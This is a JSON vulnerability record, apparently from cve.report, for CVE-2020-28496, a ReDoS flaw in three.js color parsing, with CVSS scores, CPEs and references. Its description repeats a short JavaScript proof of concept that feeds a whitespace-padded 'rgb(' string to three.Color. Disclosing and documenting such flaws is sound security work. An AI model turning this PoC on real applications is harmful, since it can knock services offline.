{"api_version":"1","generated_at":"2026-07-23T11:23:13+00:00","cve":"CVE-2020-28496","urls":{"html":"https://cve.report/CVE-2020-28496","api":"https://cve.report/api/cve/CVE-2020-28496.json","docs":"https://cve.report/api","cve_org":"https://www.cve.org/CVERecord?id=CVE-2020-28496","nvd":"https://nvd.nist.gov/vuln/detail/CVE-2020-28496"},"summary":{"title":"CVE-2020-28496","description":"This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = \"rgb(\" for (var i = 0; i < n; i++) { ret += \" \" } return ret + \"\"; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+\" ms\")","state":"PUBLIC","assigner":"report@snyk.io","published_at":"2021-02-18 15:15:00","updated_at":"2021-02-25 17:05:00"},"problem_types":["CWE-400"],"metrics":[],"references":[{"url":"https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e","name":"https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e","refsource":"MISC","tags":["Patch","Third Party Advisory"],"title":"Color: Fix ReDoS in setStyle by yetingli · Pull Request #21143 · mrdoob/three.js · GitHub","mime":"text/html","httpstatus":"200","archivestatus":"200"},{"url":"https://snyk.io/vuln/SNYK-JS-THREE-1064931","name":"https://snyk.io/vuln/SNYK-JS-THREE-1064931","refsource":"MISC","tags":["Exploit","Third Party Advisory"],"title":"Regular Expression Denial of Service (ReDoS) in three | Snyk","mime":"text/html","httpstatus":"200","archivestatus":"404"},{"url":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972","name":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972","refsource":"MISC","tags":["Exploit","Third Party Advisory"],"title":"Regular Expression Denial of Service (ReDoS) in org.webjars.npm:three | Snyk","mime":"text/html","httpstatus":"200","archivestatus":"200"},{"url":"https://github.com/mrdoob/three.js/issues/21132","name":"https://github.com/mrdoob/three.js/issues/21132","refsource":"MISC","tags":["Exploit","Issue Tracking","Third Party Advisory"],"title":"ReDoS in three · Issue #21132 · mrdoob/three.js · GitHub","mime":"text/html","httpstatus":"200","archivestatus":"200"},{"url":"https://www.cve.org/CVERecord?id=CVE-2020-28496","name":"CVE Program record","refsource":"CVE.ORG","tags":["canonical"]},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-28496","name":"NVD vulnerability detail","refsource":"NVD","tags":["canonical","analysis"]}],"affected":[],"timeline":[],"solutions":[],"workarounds":[],"exploits":[],"credits":[{"source":"LEGACY","value":"Yeting Li","lang":""},{"source":"LEGACY","value":"Liyuan Chen","lang":""}],"nvd_cpes":[{"cve_year":"2020","cve_id":"28496","vulnerable":"1","versionEndIncluding":"","cpe1":"cpe","cpe2":"2.3","cpe3":"a","cpe4":"three_project","cpe5":"three","cpe6":"*","cpe7":"*","cpe8":"*","cpe9":"*","cpe10":"*","cpe11":"node.js","cpe12":"*","cpe13":"*"},{"cve_year":"2020","cve_id":"28496","vulnerable":"1","versionEndIncluding":"1","cpe1":"cpe","cpe2":"2.3","cpe3":"a","cpe4":"three_project","cpe5":"three","cpe6":"*","cpe7":"*","cpe8":"*","cpe9":"*","cpe10":"*","cpe11":"node.js","cpe12":"*","cpe13":"*"}],"vendor_comments":[],"enrichments":{"kev":null,"epss":null,"legacy_qids":[{"cve":"CVE-2020-28496","qid":"982932","title":"Nodejs (npm) Security Update for three (GHSA-fq6p-x6j3-cmmq)"}]},"source_records":{"cve_program":{"data_type":"CVE","data_format":"MITRE","data_version":"4.0","CVE_data_meta":{"ASSIGNER":"report@snyk.io","DATE_PUBLIC":"2021-02-18T14:18:29.728676Z","ID":"CVE-2020-28496","STATE":"PUBLIC","TITLE":"Regular Expression Denial of Service (ReDoS)"},"affects":{"vendor":{"vendor_data":[{"product":{"product_data":[{"product_name":"three","version":{"version_data":[{"version_affected":"<","version_value":"0.125.0"}]}}]},"vendor_name":"n/a"}]}},"problemtype":{"problemtype_data":[{"description":[{"lang":"eng","value":"Regular Expression Denial of Service (ReDoS)"}]}]},"references":{"reference_data":[{"refsource":"MISC","url":"https://snyk.io/vuln/SNYK-JS-THREE-1064931","name":"https://snyk.io/vuln/SNYK-JS-THREE-1064931"},{"refsource":"MISC","url":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972","name":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972"},{"refsource":"MISC","url":"https://github.com/mrdoob/three.js/issues/21132","name":"https://github.com/mrdoob/three.js/issues/21132"},{"refsource":"MISC","url":"https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e","name":"https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e"}]},"description":{"description_data":[{"lang":"eng","value":"This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = \"rgb(\" for (var i = 0; i < n; i++) { ret += \" \" } return ret + \"\"; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+\" ms\")"}]},"impact":{"cvss":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"}},"credit":[{"lang":"eng","value":"Yeting Li"},{"lang":"eng","value":"Liyuan Chen"}]},"nvd":{"publishedDate":"2021-02-18 15:15:00","lastModifiedDate":"2021-02-25 17:05:00","problem_types":["CWE-400"],"metrics":{"baseMetricV3":{"cvssV3":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6},"baseMetricV2":{"cvssV2":{"version":"2.0","vectorString":"AV:N/AC:L/Au:N/C:N/I:N/A:P","accessVector":"NETWORK","accessComplexity":"LOW","authentication":"NONE","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"PARTIAL","baseScore":5},"severity":"MEDIUM","exploitabilityScore":10,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}},"configurations":{"CVE_data_version":"4.0","nodes":[{"operator":"OR","children":[],"cpe_match":[{"vulnerable":true,"cpe23Uri":"cpe:2.3:a:three_project:three:*:*:*:*:*:node.js:*:*","versionEndExcluding":"0.125.0","cpe_name":[]}]}]}},"legacy_mitre":{"record":{"CveYear":"2020","CveId":"28496","Ordinal":"190983","Title":"CVE-2020-28496","CVE":"CVE-2020-28496","Year":"2020"},"notes":[{"CveYear":"2020","CveId":"28496","Ordinal":"1","NoteData":"This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = \"rgb(\" for (var i = 0; i < n; i++) { ret += \" \" } return ret + \"\"; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+\" ms\")","Type":"Description","Title":null},{"CveYear":"2020","CveId":"28496","Ordinal":"2","NoteData":"2021-02-18","Type":"Other","Title":"Published"},{"CveYear":"2020","CveId":"28496","Ordinal":"3","NoteData":"2021-02-18","Type":"Other","Title":"Modified"}]}}}